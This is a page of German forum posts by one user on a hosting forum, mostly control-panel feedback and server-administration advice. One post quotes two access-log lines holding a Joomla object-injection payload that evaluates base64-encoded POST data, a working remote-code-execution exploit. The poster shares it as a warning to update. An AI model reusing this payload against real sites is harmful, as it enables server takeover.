Beiträge von fuerni

Zitat von [netcup] Benedikt

- Medien - DVD: Ausgewählte DVD wird nicht angezeigt
> Kann ich aktuell nicht nachvollziehen. Können Sie uns hier bitte einen Screenshot anfertigen?

Natürlich.
Was ich gemacht habe: Medien -> DVD-Laufwerk -> Bei Offizielle DVDs; DVD einlegen: eine DVD ausgewählt
Dann wird die DVD-Auswahl ausgeblendet und das Formular mit Bootmodus und Passwort angezeigt. Aber ich sehe nicht mehr, welche DVD ich ausgewählt habe. (Siehe 'PC-DVDFormPart2')
Klicke ich dann auf DVD einlegen, gebe aber kein Passwort/ein falsches Passwort ein, wird das Formular wieder komplett zurückgesetzt und ich lande bei der DVD-Auswahl. Außerdem ist die Fehlermeldung ein kleines bisschen Denglisch: 'Password' statt 'Passwort'. (Siehe 'PC-DVDWrongPassword')
Besonderer Fall am Smartphone: Wenn ich nun die letzte DVD "Windows Treiber" einlege, dann springt der Browser zu den FTP-Zugangsdaten. Je weiter unten sich die DVD in der Liste befindet, desto weiter nach unten (weiter weg vom zweiten Teil des Formulars) springe ich. (Siehe 'Droid-WinDriverDVDSelected')

Ich hoffe nun ist klar, was ich meine.
Im Vergleich dazu das alte VCP: Man wählt eine DVD CD aus, die "weiteren Einstellungen" werden aktiviert und man kann die CD einlegen. Man sieht also noch immer, was man ausgewählt hat.

Zitat von [netcup] Benedikt

- Startseite: "Läuft seit" in der Server-Tabelle sprengt die Ansicht.
> Wir haben die Informationen an dieser Stelle nun etwas restrukturiert. Ein wie von Ihnen vorgeschlagener Umbruch hat in einem internen Testlauf leider zu einer erhöhten Unübersichtlichkeit geführt.

Super - ist wohl die bessere Entscheidung gewesen. Die uptime kann man eh unter Allgemeines des jeweiligen Servers nachsehen. Eventuell wäre es noch sinnvoll, auch die "Aktion" unter Allgemeines anzuzeigen - je nachdem was unter Aktion angezeigt wird. (Ich vermute, dort wird angezeigt, wenn ein Image installiert wird, der Server defragmentiert wird, oder ähnliches - wäre also gut, dies auch unter Allgemeines zu platzieren)

Zitat von [netcup] Benedikt

- VNC Konsole nicht verwendbar
> Ich habe die VNC Konsole nun für die mobile Nutzung aktuell ausgeblendet. Hier greifen wir auf eine Drittanbieterlösung zurück, welche in keinster Art und Weise responsive/Smartphonetauglich entwickelt wurde. Wir werden weitere Schritte hier Teamintern besprechen.

Solange diese nicht halbwegs vernünftig per Smartphone bedient werden kann, ist das wohl die bessere Lösung. Und per Browser am Smartphone wird das vermutlich sehr schwer, besonders bei Drittanbieterlösungen.

Zitat von [netcup] Benedikt

- Direkter VNC-Zugriff
> Wird es, nach aktuellem Stand, nie geben. Wir haben uns hier einstimmig im Team gegen eine solche Lösung entschieden, da diese zahlreiche kritische Sicherheitsproblematiken mit sich bringen würde. Da Sie als Kunde jedoch einen eigenen VNC Server auf Ihrem Server betreiben können, stünden diese Problematiken so in keiner Relation mit dem erreichbaren Nutzen.

Ja, verstehe ich vollkommen. Wäre meinerseits auch nur gedacht gewesen, dies per SCP kurzfristig zu aktivieren und den Zugriff z. B. nur für die aktuelle IP-Adresse des Clients zu erlauben, um eben die Problematik mit der Smartphone Konsole des SCP zu lösen.
Allerdings hat so ein VNC-Zugriff per Smartphone meiner Meinung nach eine sehr niedrige Priorität. Dieses Feature würde wohl sehr selten jemand benötigen.

Suche nach Servern:
Fehlermeldung bei keinem Treffer ist noch in Englisch: No results matched "xyz"
Evtl. sollte man sich überlegen, die Suche erst ab einer gewissen Anzahl an Servern (z. B. 5) einzublenden.
Weiters ist das Suchfeld nicht als solches gekennzeichnet (z. B. durch ein Lupen-Icon)

Danke an die schnellen Entwickler und an die Offenheit für Anregungen.

Ich verwende auf meinem gerooteten Android-Gerät dafür die App AdAway, welche sämtliche Domains per Hosts-Datei blockiert.
Es verwendet dabei mehrere Listen, wobei man auch selbst Domains oder ganze Listen hinzufügen kann.

Ich hatte dadurch eigentlich noch nie Werbung auf meinem Smartphone.

Quelle: AdAway im F-Droid Store

Zuerst mal Glückwunsch zum gelungenen neuen SCP.

Hier meine Anmerkungen dazu, was mir so aufgefallen ist (großteils Kleinigkeiten):

Allgemeines

• Logo wirkt unscharf, besonders auf Bildschirmen mit hoher Auflösung
• Favicon noch alt (VCP)
• Switch-Control (Checkbox-Ersatz) ist meiner Meinung nach nicht klar als solches erkennbar.
• Medien - DVD: Ausgewählte DVD wird nicht angezeigt
• Medien - DVD: "DVD einlegen" nach Auswahl nicht wirklich als Button erkenntlich
• Anmerkung zur vorherigen Aussage bzgl. Sicherheit durch Token: Wenn man sich übers CCP anmeldet, bleibt die Session dort ja weiterhin aktiv, und man kann sich durch einen Klick erneut anmelden. Ist das nicht irgendwie eine Art Hintertür?

Mobil-Ansicht (Firefox auf Android 6, 5", 1080p)

• Startseite: "Läuft seit" in der Server-Tabelle sprengt die Ansicht. IMHO wären hier Blöcke besser, die auf kleinen Displays automatisch in die nächste Zeile springen, anstatt einer Tabelle.
• Allgemein, Netzwerk Interfaces, Log: Vertikales Scrollen möglich, obwohl alles angezeigt werden kann (zu viel Abstand am Rand)
• Einstellungen: Bootreihenfolge (Drag-n-Drop) nicht änderbar
• Menü könnte sich auch beim Klick auf den Servernamen öffnen, anstatt nur beim Burgerbutton.
• VNC Konsole nicht verwendbar: An den Rändern werden ein paar Pixel abgeschnitten (siehe Screenshot), man würde sich eine Skalierung auf < 100 % wünschen, die Buttons (Zoom Minus, Show Keyboard) funktionieren nicht.

Feature-Requests

• ISO-Upload per URL: Einfach URL zum ISO-File eingeben und mit einem Klick (und viel weniger Zeit als beim Upload vom DSL-Anschluss) ist die Datei am FTP-Server.
• Direkter VNC-Zugriff: Dadurch könnte man Apps am Handy verwenden. Per Browser wirds wohl sehr schwierig werden...

Das wärs inzwischen mal.

Zitat von Dragon

Das kommt darauf an, was du überwachen willst.

Ein paar (max. 10) Linux-Server mit Webserver, MySQL, Mailserver - mit Mail-Alert bei Ausfall. Also genaue Auslastung ist für mich derzeit noch nicht wichtig, sondern nur ob alles läuft.

Da nun schon öfter das Stichwort Monitoring gefallen ist, und das auch mein erster Gedanke war:
Welche Tools würdet ihr hierfür empfehlen, die auch mit diesen knappen Ressourcen klarkommen würden?

Habe vor, mir einen VPS20 dafür zu holen.

Zitat von Andreas B

Bezieht sich das auf jeweils einen VPS10, VPS20 und VPS50, oder auf insgesammt einen aus der Erweiterung der Produktreihe?

Laut Facebook-Komentar von netcup je Anbot einen, also 1 x VPS10, 1 x VPS20 und 1 x VPS50 darfst du dir bestellen.

Falls es wirklich nur um den Speicherplatz geht, würde sich etwas warten vielleicht lohnen.
Netcup plant "Storage-vServer", siehe https://www.facebook.com/netcup/posts/1119823144742007.

Mit einem "Root-Server" kannst du diese allerdings nicht vergleichen, eher mit einem "VPS".

Bei meiner .eu Domain fehlt die Zeile mit der DNSSEC Funktion.
Bei .at und .de ist sie vorhanden. Hätte allerdings am liebsten mit der .eu getestet...

Frage: Ist geplant in Zukunft auch TLSA Records zu unterstützen?

Zitat von deinem Link:

Zitat

Hyper-V relies on hardware virtualization support (e.g. Intel VT-x and AMD-V) to run virtual machines.

Da Netcup bei den KVM-Servern die Virtualization Extensions nicht aktiviert hat, ist es nicht möglich, Hyper-V darauf zu betreiben.

Zitat von ChrisDo91

Prinzipiell ja. Ich verstehe den Artikel jedoch so, dass es nur möglich ist Hyper-V in Hyper-V zu visualisieren.

Genau, das sagt der Artikel. Wobei man ergänzen muss, dass Hyper-V zum Beispiel problemlos in VMware läuft, wenn man die Virtualisierung von Intel VT-x/EPT bzw. AMD-V/RVI aktiviert.

Habe zum Glück schon gestern upgedated,
habe heute schon zwei Angriffe in den Logs auf meinem Server gesehen.

Sind zwei unabhängige Joomla 2.5 Installationen.

85.245.242.72 - - [15/Dec/2015:02:32:43 +0100] "GET / HTTP/1.1" 200 2270 "http://domain1.tld/" "}__test|O:21:"JDatabaseDriverMysqli":3:{s:2:"fc";O:17:"JSimplepieFactory":0:{}s:21:"\\0\\0\\0disconnectHandlers";a:1:{i:0;a:2:{i:0;O:9:"SimplePie":5:{s:8:"sanitize";O:20:"JDatabaseDriverMysql":0:{}s:8:"feed_url";s:60:"eval(base64_decode($_POST[111]));JFactory::getConfig();exit;";s:19:"cache_name_function";s:6:"assert";s:5:"cache";b:1;s:11:"cache_class";O:20:"JDatabaseDriverMysql":0:{}}i:1;s:4:"init";}}s:13:"\\0\\0\\0connection";b:1;}\xf0\x9d\x8c\x86"
178.20.55.16 - - [15/Dec/2015:02:34:24 +0100] "GET / HTTP/1.1" 200 4511 "http://domain2.tld/" "}__test|O:21:"JDatabaseDriverMysqli":3:{s:2:"fc";O:17:"JSimplepieFactory":0:{}s:21:"\\0\\0\\0disconnectHandlers";a:1:{i:0;a:2:{i:0;O:9:"SimplePie":5:{s:8:"sanitize";O:20:"JDatabaseDriverMysql":0:{}s:8:"feed_url";s:60:"eval(base64_decode($_POST[111]));JFactory::getConfig();exit;";s:19:"cache_name_function";s:6:"assert";s:5:"cache";b:1;s:11:"cache_class";O:20:"JDatabaseDriverMysql":0:{}}i:1;s:4:"init";}}s:13:"\\0\\0\\0connection";b:1;}\xf0\x9d\x8c\x86"

Also schnell updaten - die Angriffe finden bereits statt. Auch auf nicht wirklich bekannte Websites.

EDIT:
Ich konnte nun feststellen, dass bei beiden Seiten das Joomla-Generator-Tag nicht entfernt wurde.
Deshalb sollte man in der index.php-Datei des Templates folgende Zeile einfügen:

$this->setGenerator(null);

Lg
Fürni

Du solltest für jedes Projekt eine eigene vHost Konfiguration anlegen,
dann kannst du je Projekt (also je Domain) genau den DocumentRoot festlegen und kannst die unschöne .htaccess-Datei komplett weggeben.
Du brauchst also lauter einzelne <VirtualHost *:80> Blöcke, in denen du jeweils ServerName domain.tld und DocumentRoot /var/www/project sowie alle anderen notwendigen Einstellungen festlegst.

Falls du damit noch keine Erfahrung hast, wäre es eventuell auch sinnvoll, ein Management Tool wie Froxlor, ISPConfig oder iMSCP einzusetzen.

Deinen bisherigen Ansatz, alles über eine .htaccess-Datei laufen zu lassen und dort dann mit mod_rewrite zu umschreiben ist weder schön noch performant.
Versuchs mit den vHosts - geht besser und macht weniger Probleme.

Um dir weiterzuhelfen wäre es hilfreich, wenn du uns sagst, was du da alles unter dieser Domain laufen habn möchtest.
Wenn es sich um simple .htaccess-Redirects für die anderen Projekte handelt, könntest du diese in den Unterordner verschieben, also nach "webseite/template"

Es wäre auch möglich, den Teil der URL per mod_rewrite auszublenden, für wirklich sinnvoll halte ich das allerdings nicht.
Um es auch erwähnt zu haben: Die wohl einfachste aber unschönste Lösung wäre ein HTML-Frame.
Eine saubere Lösung ist einzig und allein das Ändern des Document Roots auf webseite/template.

Falls du in dem Ordner, in dem "webseite" liegt auch andere Projekte hast, könntest du dafür ja eine Subdomain einrichten, dann wären die htaccess-Redirects nicht mehr notwendig und auch das Problem mit dem Ändern des Document Roots fällt weg.

Wie heavygale schon geschrieben hat, löst ein DNS-Server nur die Domain in die IP-Adresse auf, also z. B. netcup.de nach 46.38.224.30. Mehr ist über den DNS nicht möglich.

Zitat von janxb

5) Die Installation ist im Hintergrund keine, sondern nur das Aufspielen und Anpassen eines fertigen Images auf deinen vServer. Diesen Vorgang kann man nicht live mitverfolgen. Alternativ könntest du dir aber eine eigene ISO-Datei hochladen und dann mittels der VNC-Konsole installieren.

Das stimmt so nicht. Das gilt nur, wenn der Server kein DVD-Laufwerk hat. Bei der v6 haben alle bis auf den S und M-Aktion ein DVD-Laufwerk dabei. Man kann die Installation eines beliebigen Betriebssystems also durchaus per VNC-Console durchführen.

Allerdings wirst du, wie Skulduggery und Dragon bereits erwähnt haben, Probleme mit der Virtualisierung haben. Die speziellen Virtualisierungs-Befehle werden von den Netcup vServern meines Wissens nach nicht unterstützt.
Das heißt zwar nicht automatisch, dass Virtualisierung überhaupt nicht möglich ist, allerdings vermutlich um einiges längsamer und nicht mit jeder Virtualisierungslösung.
Laut diesem Heise-Artikel benötigt Hyper-V VT-x - wird also wahrscheinlich nicht funktionieren.

fallobst:
Ja, stimmt. Hast du gut erkannt.
Vergleiche mit netcup GmbH - Root-Server / vServer bzw. netcup.de - Produktdetails im Web-Archive.

Überall wurde der Text allerdings noch nicht geändert. Wenn du jetzt bestellst könntest du den Prozessor also noch einklagen - theoretisch.

Diese stillen und heimlichen Änderungen mag ich irgendwie gar nicht. Wenns wenigstens im Forum eine offizielle Ankündigung geben würde ...
Irgendwie kommt es mir derzeit manchmal so vor, als ob Netcup irgendwelche internen Probleme hätte, in finanzieller Hinsicht oder wie auch immer.

Sofern du nicht einen sehr hohen Sicherheitsstandard erreichen möchtest, kannst du denke ich durchaus Froxlor mit Apache verwenden.
Falls du Angriffe auf das Froxlor-Panel verhindern möchtest, kannst du es ja so einrichten, dass es nur lokal am Server erreichbar ist und dann immer über einen SSH-Tunnel darauf zugreifen.

Am Anfang ist es meiner Meinung nach wesentlich einfacher, wenn man so ein Tool verwendet. Besser eine halbwegs gute Config, welche vom Tool erstellt wird, wie eine unsichere, die man selbst erstellt.
Auch ich setze seit Jahren auf solche Tools, da es ab einer gewissen Anzahl an Seiten sehr umständlich ist, diese selbst zu verwalten. Ich setze dabei aber immer auf freie Tools, da kann man auch mehr selbst herumbasteln, falls man das möchte. Bei Plesk bist du meiner Meinung nach schon stark eingeschränkt.

Falls du die Performance optimieren möchtest, kann es sich schon auszahlen, auf Lighttpd oder Nginx zu setzten. Allerdings zahlt sich das für wenige Besucher nicht aus. Ich denke für den Anfang reicht für dich der Apache locker.

Bzgl. SSH:
Ich würde auf jeden Fall den Port ändern. Damit verhinderst du die einfachsten Angriffe und schonst somit auch deinen Server und das gesamte Netzwerk. (Nur 1 Versuch statt 4 bei Fail2Ban).
Außerdem rate ich dir, Keyfiles statt Passwörter zu verwenden und den Login auch nur per Keyfile zu erlauben.
Root-Login musst du dann meiner Meinung nach nicht unbedingt deaktivieren. Denn wenn es jemand geschafft hat, sich bei dieser Konfiguration mit deinem SSH-User einzuloggen, dann schafft er es auch noch, sich root-Rechte zu besorgen.
Falls es dir aber nichts ausmacht, jedes mal sudo zu tippen, bedeutet das natürlich wieder ein kleines bisschen mehr Sicherheit.

Bitte beachte dabei, dass der Webspace die Möglichkeit bieten muss, externe Domains aufzuschalten.

Auf dem Webspace reicht es dann, wenn du im Verzeichnis, auf welches die Domain zeigt, eine .htaccess-Datei mit folgendem Inhalt anlegst:

Redirect / https://www.facebook.com/YourPageName

Anschließend musst du noch im CCP einen A-Record anlegen, welcher auf die IP des Servers deines Webspaces zeigt.
Welche Einstellungen du genau vornehmen musst, erfahrst du von deinem Webspace-Anbieter.

Lg
Fürni

Laut der Domain-Angebots-Seite von netcup sind Domains ohne Webspace oder Server nicht möglich:

Zitat

Kunden die über uns ein Webhostingpaket, einen vServer oder einen managed vServer / managed dedicated Server beziehen, können zu besonders günstigen Konditionen bei uns weitere Domains hinzu buchen.

Du kannst eine netcup-Domain nicht auf eine andere Website weiterleiten, dazu bräuchtest du einen Webspace.
Du hast drei Möglichkeiten:
1. Du holst dir bei netcup einen Webspace und erstellst dort die Umleitung
2. Du ziehst deine Domain zu einem anderen Provider um, welcher das gewünschte Feature unterstützt
3. Du holst dir einen (kostenlosen) Webspace eines anderen Anbieters und erstellst dort eine Umleitung

Lg
Fürni

Bist du dir sicher, dass du nichts eintippen kannst?

Bei der Linux Shell wird nämlich das Passwort nicht angezeigt, also auch keine Sternchen oder Punkte.

Versuch mal das Passwort einzutippen und einfach Enter zu drücken.

(Falls du Copy/Paste versuchst, Paste geht bei PuTTY mit einem einfachen Rechtsklick.)

Für den Login verwendest du die Zugangsdaten, welche du nach der Einrichtung des vServers per E-Mail zugesandt bekommen hast bzw. im VCP beim Installieren des Images angezeigt bekommen hast.

Falls du das Passwort nicht mehr hast, installier einfach das gewünschte Image neu per VCP.
Dort bekommst du dann die Zugangsdaten nach dem Installationsvorgang angezeigt.

Der Username ist jedenfalls immer root.

Danke an den Einsatz vom Netcup-Team am Feierabend/Feiertag.

Bei mir betrug die Downtime etwa 15 Minuten.
Komisch war allerdings, dass HTTP sofort erreichbar war, SSH aber erst einige Minuten später.
Zuerst dachte ich Fail2Ban hätte mich ausgesperrt, aber selbst von meinem mobilen Internet ging es nicht.
Einige Minuten später ging es dann auf einmal ohne Probleme - warum auch immer. Vielleicht hat einfach das Starten von SSHD etwas länger gedauert...

Zu den Beschwerden bzgl. Datenverlust:
Wer trotz regulärem Shutdown per ACPI einen Datenverlust hat, ist meiner Meinung nach selbst Schuld. Da ist dann etwas grob falsch konfiguriert.
Außerdem gibt Netcup sowieso keine Garantie bzgl. Datenverlust ab. Backups muss jeder selbst machen, theoretisch könnten alle Festplatten auf der Stelle ausfallen und die Daten sind weg.

Und zur späten E-Mail:
Wenn für jemanden das so ein kritisches System ist, sollte er sich eine eigene E-Mail-Adresse für solche wichtigen Benachrichtigungen anlegen und dieses Postfach per Push auf dem Smartphone empfangen. Somit kann so eine Meldung nicht untergehn.
Natürlich wäre es dazu toll, wenn man bei Netcup mehrere E-Mail-Adressen konfigurieren könnte. (Eigene Mailadresse für Rechnungen und für technische Belange)

Aber nochmals ein großes DANKE ans Netcup-Team.